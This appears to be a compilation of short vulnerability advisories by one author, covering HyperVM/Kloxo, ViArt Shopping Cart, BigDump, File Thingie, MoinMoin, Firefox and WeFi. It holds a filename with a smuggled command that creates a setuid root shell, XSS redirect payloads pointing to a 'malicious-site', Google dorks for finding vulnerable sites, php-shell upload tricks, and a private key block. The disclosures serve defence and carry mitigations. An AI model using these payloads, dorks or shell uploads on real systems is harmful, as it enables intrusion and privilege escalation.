HyperVM File Permissions Local Vulnerability
HyperVM is a virtualization application that runs off a host node and can
provide
several Virtual Private Servers. There is a previously unreported vulnerability
in
HyperVM/Kloxo.
It was originally documented in ISSUE 14 by an anonymous author:
http://www.milw0rm.com/exploits/8880
It turns out that he was showing how a root shell can be created:
[us...@testing574 tmp]$ ls -al
total 28
drwxrwxrwt 4 root root 4096 May 21 08:41 .
drwxr-xr-x 24 root root 4096 May 19 16:57 ..
-rw-rw-r-- 1 user1 user10 May 21 08:40 ;cd ..;chown root.root
shell;chmod 4755 shell;
drwx-- 2 root root 4096 May 21 08:41 backupPdUzR4
-rwsr-xr-x 1 root root 5056 May 21 08:41 shell
-rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c
This is pointless, because after a 'restore from backup' in HyperVM, it creates
that folder
"backupPdUzR4"
Let's take a look at it...On a VM I tested, even the directory was readable.
$ ls -lha /tmp/backupfileIy00MO/
total 36K
drwxr-xr-x 2 root root 4.0K Dec 12 02:18 .
drwxr-xr-x 3 root root 4.0K Dec 12 10:37 ..
-rw-r--r-- 1 root root 15K Dec 12 00:46 hypervm.file
-rw-r--r-- 1 root root 11K Dec 12 00:46 hypervm.metadata
World readable files. In it, root passwords in plain text. Including username,
RSA private keys and lots more.
Here the VM type is shown, it appears to be OpenVZ:
$ cat hypervm.file
al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__op
envz";
--snip--
Private keys!
"hostname";s:8:"fakevps";s:12:"use
rname";s:10:"fakeusername";s:16:"text_private_key";s:887:"-BEGIN RSA
PRIVATE KEY-
FIICXZIBAAKBgQDdehG9ScmFWL3AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9
dJ/gI+NoY1ygic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQC
Lf17blSAQAXPi84Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY8QpSewoVQIDAQAB
AoGBAKVT7E4a+L38AmoHlWa4KGfCx5hqHC0ZODzQkGG+3HUn0hjyrUlzd6z/3VAd
bBXDCUYf82XMY3h0bOElKPwvHw3+sgUyceSBONLa9pi+He/6ljwR0/LG6XjctdLH
RwVNTEXY/JS15VRKyyXMdohhVbIXa3NjbMqvIBEJPmnjVlWBAkEA90xPi9te3HYj
54uH7/+cEuZ9TlLyeB9+MQ0t7MfqNY1v2PRK+h4J6y4N+v43o9kkN7RGR3zd5Bww
qP/TEfBL8QJBAOVFKGMwkY/2dhqKjnHC2rkN8B5Hn8Px2quf7SXn2tgnuZRYOxah
WAtzdZSt64Vsaz+3fh6tIZ6YYQo/BYJMlqUCQD/UpIWPmZrCqJgVLn/n9kvu0xSh
V1ZpkvNo2p1RMwamP+S7lIujq53aYuOUM5sKGM6ErMwR0VrtaCaI/N2ZspECQBZn
P58Rq+epabkGOQ0cwUq79e6/iPkYtQl4QzAlC9kRF61LQdrgQT49NgwlQpJzGbfM
TmLFADgDI9hgeCVXXpECQQC0c5owQrCx38xtZp6dydAccnHo4jrC83lRL6Epxueo
i+3UYzuVxCQkBdhoF/5nsXv5Qh914MHGnH12qepPokyjd
-END RSA PRIVATE KEY-
";s:15:"text_public_key";s:1188:"-BEGIN CERTIFICATE-
BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh
YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw
CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A
bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR
BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG
Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN
AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg
ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP
i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G
A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy
d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG
A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx
DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C
AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk
HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1
LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b
uR24why0WWPNsyJU3adesPo4eQf==
-END CERTIFICATE-
--snip--
Root passwords!
sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"";s:20:"rootpassword_changed";s
So in summary, here are the exploitation steps:
1. Log into HyperVM/Kloxo
2. Click "Backup Home"
3. In the field labeled "Restore from file", browse for any restore file from
the popup box.
4. Wait till the VM has finished restoring from backup.
5. Login. If the root user hasn't deleted these files from /tmp/backupX
before bringing up the network interface, you win.
Mitigation:
After the VM is restarted, manually delete these files as the root user before
anyone else reads them.
Regards,
Xia Shing Zee
Cross-site Scripting vulnerability in Stronghold/2.3 Apache/1.2.6 C2NetUS/2007
!vuln
Stronghold/2.3 Apache/1.2.6 C2NetUS/2007
Previous versions may also be affected.
!risk
Low
There are currently only a few websites circulating with
Stronghold/2.3 enabled.
!notes
Stronghold/2.3 does not properly sanitize user input and echoes the page
requested in
the URL as valid HTML and Javascript. This can cause XSS flaws.
!examples
Example 1: http://world.std.com/alert("lol");
Example 2:
http://world.std.com/window.location="http://www.google.com";
Example 3: http://world.std.com/
!solution
Do not use Stronghold/2.3. The vendor has not been notified.
!greetz
Greetz go out to the people who know me.
!author
Xia Shing Zee
Remote access vulnerability using File Thingie v2.5.4
!vuln File Thingie v2.5.4 Previous versions may also be affected. !risk Low There are currently just a few websites circulating with File Thingie enabled. !dork Dork: intitle:"File Thingie 2.5.4" !discussion A user is able to successfully upload files onto a server by uploading a php shell such as c99.php, by renaming it c99.php.sql !notes This is the exact same vulnerability that affected BigDump v0.29b. !solution Do not use File Thingie or put non-root/guest permissions on the folder containing File Thingie. The vendor has not yet been notified. !greetz Greetz go out to the people who know me. !author Xia Shing Zee
Re: Re: Denial of Service using Partial GET Request in Mozilla Firefox 3.06
This is a bug in WMP: http://support.microsoft.com/kb/947541 Firefox should not use WMP though.
Re: Denial of Service using Partial GET Request in Mozilla Firefox 3.06
It's been confirmed that this is not problem in IE. Sorry I didn't mention that. Microsoft uses Silverlight: GET /index.php?page=Poem/Poem.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */* Accept-Language: en-au UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618) Host: www.footprints-inthe-sand.com Connection: Keep-Alive It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight)
Denial of Service using Partial GET Request in Mozilla Firefox 3.06
!vuln Mozilla Firefox 3.06 Previous versions may also be affected. !risk Medium There are currently many users using Mozilla Firefox. However, there has been no confirmation of remote execution of arbitrary code yet. !info Tested on: Windows Vista Version Service Pack 1 Build 6001 Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 2401 Mhz, 2 Core(s), 2 Logical Processor(s) User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729) !discussion The Partial GET Request (HTTP 206 Status Code) of a WAV file results in a Denial of Service of the application. Last HTTP packet from Firefox before the DoS is listed below in RAW format: GET /fpaudio/footprints_waves.wav HTTP/1.1 Accept: */* User-Agent: NSPlayer/11.0.6001.7001 WMFSDK/11.0 UA-CPU: x86 Accept-Encoding: gzip, deflate Range: bytes=34848- Unless-Modified-Since: Mon, 09 Jul 2007 12:44:57 GMT If-Range: "4f0018-440f2-434d403204440" Host: www.footprints-inthe-sand.com Connection: Keep-Alive The OK GET Request (HTTP 200 Status Code) of the WAV file is listed below in RAW format: GET /fpaudio/footprints_waves.wav HTTP/1.1 Accept: */* User-Agent: Windows-Media-Player/10.00.00.3802 UA-CPU: x86 Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: www.footprints-inthe-sand.com !Proof of Concept http://www.footprints-inthe-sand.com/index.php?page= Poem/Poem.php !solution There is currently no solution. The vendor has not yet been notified. !greetz Greetz go out to the people who know me. !author Xia Shing Zee
Full Path Disclosure In Photolibrary 1.009(Update)
There has been a change to the solution.
!solution
Change line 48 so that the include statement stops null input and incorrect
input:
if($page == NULL)
echo("Get lost! Stop Trying to get path disclosure!");
else
{
if(!file_exists($page.'.css'))
{
echo("Get lost! Stop Trying to get path disclosure!");
}
else
{
include($page.'.css');
}
}
The vendor has not yet been notified.
!author
Xia Shing Zee
Full Path Disclosure In Photolibrary 1.009
!vuln
Photolibrary 1.009
Previous versions may also be affected.
!risk
Low
There are currently just a few websites circulating with
Photolibrary enabled.
!dork
Dork:
inurl:"/photos" photolibrary All images are the copyright of
their respective authors. Link to this page
!discussion
Null user input in the following PHP file results in full
path disclosure of the document root folder because of the
include function:
site.com/photolibrary.1.009/photolibrary/css/style.php?page=
!solution
Change line 48 so that the include statement stops null
input:
if($page == '')
echo ("Get lost! Stop Trying to get full path disclosure!");
else
{
include($page.'.css');
}
The vendor has not yet been notified.
!greetz
Greetz go out to the people who know me.
!author
Xia Shing Zee
ViArt Shopping Cart v3.5 Multiple Remote Vulnerabilities
===
!vuln
ViArt Shopping Cart v3.5 is prone to multiple remote
vulnerabilities. Earlier versions may also be affected.
===
===
!dork
Dork: intext:"Free Ecommerce Shopping Cart Software by ViArt" +"Your shopping
cart is empty!" + "Products Search" +"Advanced Search" + "All Categories"
===
===
!risk 1 - Full Path Disclosure
Low
Attackers can use this vulnerability to leverage another attack
after the full path has been disclosed.
===
===
!discussion 1 - Full Path Disclosure
The server will give an error when any URL real/imaginary is
passed to the POST_DATA parameter:
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com
A remote user is able to identify the full path of the document
root folder.
===
===
!risk 2 - Information Disclosure
Medium
The table names can be further leveraged for a SQL injection if
one exists.
===
===
!discussion 2 - Information Disclosure
When a user is not signed in, the tables are shown to the
attacker via an error, because the PHP form fails to properly
sanitize user_id since the user is not logged in.
The attacker must first try to add a product to the cart and
then save the shopping cart for the tables to be revealed by
browsing to: http://www.victim.com/cart_save.php
===
===
!risk 3 - Arbitrary Code Injection
High
Attackers can use this vulnerability to execute arbitrary code
on a legitimate user.
===
===
!discussion 3 - Arbitrary Code Injection
The attacker is able to create shopping carts with
HTML/Javascript injected code such as:
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=http://www.google.com";>Google
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=alert("VULN");
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=window.location="http://malicious-site.com";;
Then when the user visits "My Saved Carts" at
http://victim.com/user_carts.php the code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a javascript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.
Note: manuals_search.php is also vulnerable to the same
HTML/Javascript vulnerability that allows for arbitrary code to
be executed:
http://www.victim.com/manuals_search.php?manuals_search=window.location="http://malicious-site.com";;
A remote user is able to identify the full path of the document
root folder.
===
===
!extras
The Cart name is all that needs to be guessed/brute-forced for
an attacker to gain entry to the shopping cart. As the cart-id
increments from 1 upwards. This does not require any user-login
from the attacker.
An attacker could also overload the server with a ton of
shopping carts by constantly refreshing cart_save.php to create
multiple shopping cart ID's.
===
===
!solution
ViArt Shopping Cart can still be used, but be wary of the full
path disclosure and make sure no SQL injections can take place
once an attacker knows the table names. Alert users that they
should be wary of which links they click on as an attacker
could redirect them to a malicious site. The overloading of
cart_save.php can be solved by placing IP-bans on attackers.
There is no solution to the brute-force guessing of cart names.
The vendor has not yet been notified.
===
===
!greetz
Greetz go out to the people who know me.
===
=
Re: Opera 9.6x file:// overflow
It works on Opera 9.62 with Vista Business running and the crash produces: You tried to access the address file://xxx x ! xx x ! xx
Multiple remote vulnerabilities MoinMoin v1.80
=== !vuln MoinMoin v1.5.9 is prone to multiple remote vulnerabilities. Earlier versions may also be affected. MoinMoin v1.80 is also affected to a lesser extent. Other versions may also be affected. === === !dork Dork: "* MoinMoin Powered * Python Powered * Valid HTML 4.01" === === !risk 1 - Denial Of Service Low The denial of service only results on the end-users side. === === !discussion 1 - Denial Of Service http://wiki.site.org/%08?action=fullsearch&value=linkto%3A%22%0 8%22&context=180 Changing the URL of a linkto URl results in end-user denial of service conditions if ASCII characters are injected. === === !risk 2 - Full Path Disclosure Medium Attackers can use this vulnerability to leverage another attack after the full path has been disclosed. === === !discussion 2 - Full Path Disclosure http://wiki.site.org/VulnVulnVulnVuln/VulnVulnVuln/Vul. A remote user is able to identify several details about the system from the python traceback error after injecting an extremely long URL string. The uname -a (the platform and OS), the python release, the full path of the htdocs folder and python folder, and the version of MoinMoin that is running. However, MoinMoin v1.80 does not disclose the python release and the version of MoinMoin. === === !solution MoinMoin can still be used, but be wary of the full path disclosure. The vendor has not yet been notified. === === !greetz Greetz go out to the people who know me. === === !author Xia Shing Zee ===
Remote access vulnerability using BigDump ver. 0.29b
!vuln BigDump ver. 0.29b Previous versions may also be affected. !risk Medium There are currently many websites circulating with BigDump enabled. !dork Dork: intitle:"BigDump ver. 0.29b" !discussion A user is able to successfully upload files onto a server by uploading a php shell such as c99.php, by renaming it c99.php.sql !solution Do not use BigDump or put non-root/guest permissions on the folder containing BigDump. The vendor has not yet been notified. !greetz Greetz go out to the people who know me. !author Xia Shing Zee
Local information disclosure in WeFi Client v3.3.3.0
== INFO == The wireless client, WeFi v3.3.3.0 is susceptible to a local information disclosure due to irresponsible coding. Earlier versions may also be affected. == DISCUSSION == Due to the WeFi client storing the keys in memory, a dump is able to show valid WEP, WPA and WPA2 keys that can be used by a local attacker. This information can often be found around the 044296C0 offset. An attacker could easily dump the credentials from memory whilst walking past a laptop with an autorun U3 USB. The file that keeps the keys in memory is as follows: C:\Program Files\WeFi\WeFi.exe == SAMPLE 1 == Here is a sample of the hexadecimal memory dump: Offset00 01 02 03 04 05 06 07 08 09ASCII 044296C0 03 8B CB 00 30 39 46 38 32 39.Ë.09F829<--WEP KEY 044296CA 38 30 43 58 00 00 00 00 00 0080CX..<--WEP KEY As you can see, the WEP key, "09F82980CX" has been stored in plain text. The WEP Key has been changed from its true values to protect the identity and anonymity of the victim. == SAMPLE 2 == A few lines down and we find the SSID, "linksys": Offset00 01 02 03 04 05 06 07 08 09ASCII 044296FC 00 00 00 00 00 00 00 00 6C 69li<--SSID 04429706 6E 6B 73 79 73 2E 2E 2E 2E 2Enksys.<--SSID The SSID has been changed from its true values to protect the identity and anonymity of the victim. == NOTES == The WeFi client continues to keep the WEP keys long after the client has authenticated with the wireless access point. The first network that the client authenticates with is around 044296C0 and further wireless keys can be found after that offset. All wireless keys are accompanied with their respectable SSID shortly after the key. == SOLUTION == Do not keep the wireless encryption keys in the program and disallow the client to "Remember Key". The wireless key should only be used during authentication and should not be kept in the system memory. Encryption is no longer a valid solution as this can be reversed if the algorithm is known or reversed. The vendor has been notified. == Thanks, Xia Shing Zee
Local vulnerability in WeFi Client v3.2.1.4.1(Update)
== INFO == The wireless client, WeFi v3.2.1.4.1 is susceptible to local vulnerabilities due to improper coding. Earlier versions may also be affected. == DISCUSSION == Due to lack of improper encryption and the client storing backups of the log files, a local attacker can gain unencrypted keys to WEP, WPA and WPA2 access points. The log files that keep the keys are as follows: C:\Program Files\WeFi\LogFiles\ClientWeFiLog.dat C:\Program Files\WeFi\LogFiles\ClientWeFiLog.bak C:\Program [EMAIL PROTECTED] (Yet to be confirmed, heavily encrypted) == SAMPLE == Here is a sample of the backup file code: a11ae90c2b66|7a000b|6|c8e|736|3f2a||0|0|35|6570|Create Profile| a11ae90c2d4a|7a000b|6|c8e|736|3f2a||0|0|35|6571|try to connect| a11ae90c2d4a|7a000b|6|c8e|736|3f2a||0|0|35|6572|09F82980CX| As you can see, the key has been stored in plain text at the end of the last line. == NOTES == It is to be noted that the backup file, .bak, is still viewable even after the client is closed. When the .dat file exceeds 3000kb, it moves the data to the .bak file and subsequently when that file exceeds 3000kb, the data is deleted. This can exceed over a day of normal internet browsing. The .dat file shows the unencrypted keys several lines after the phrase, "Create Profile". It also shows failed attempts at connecting to a wireless access point. == SOLUTION == Use heavier encryption or do not keep log files. The vendor has been notified. == Thanks, Xia Shing Zee
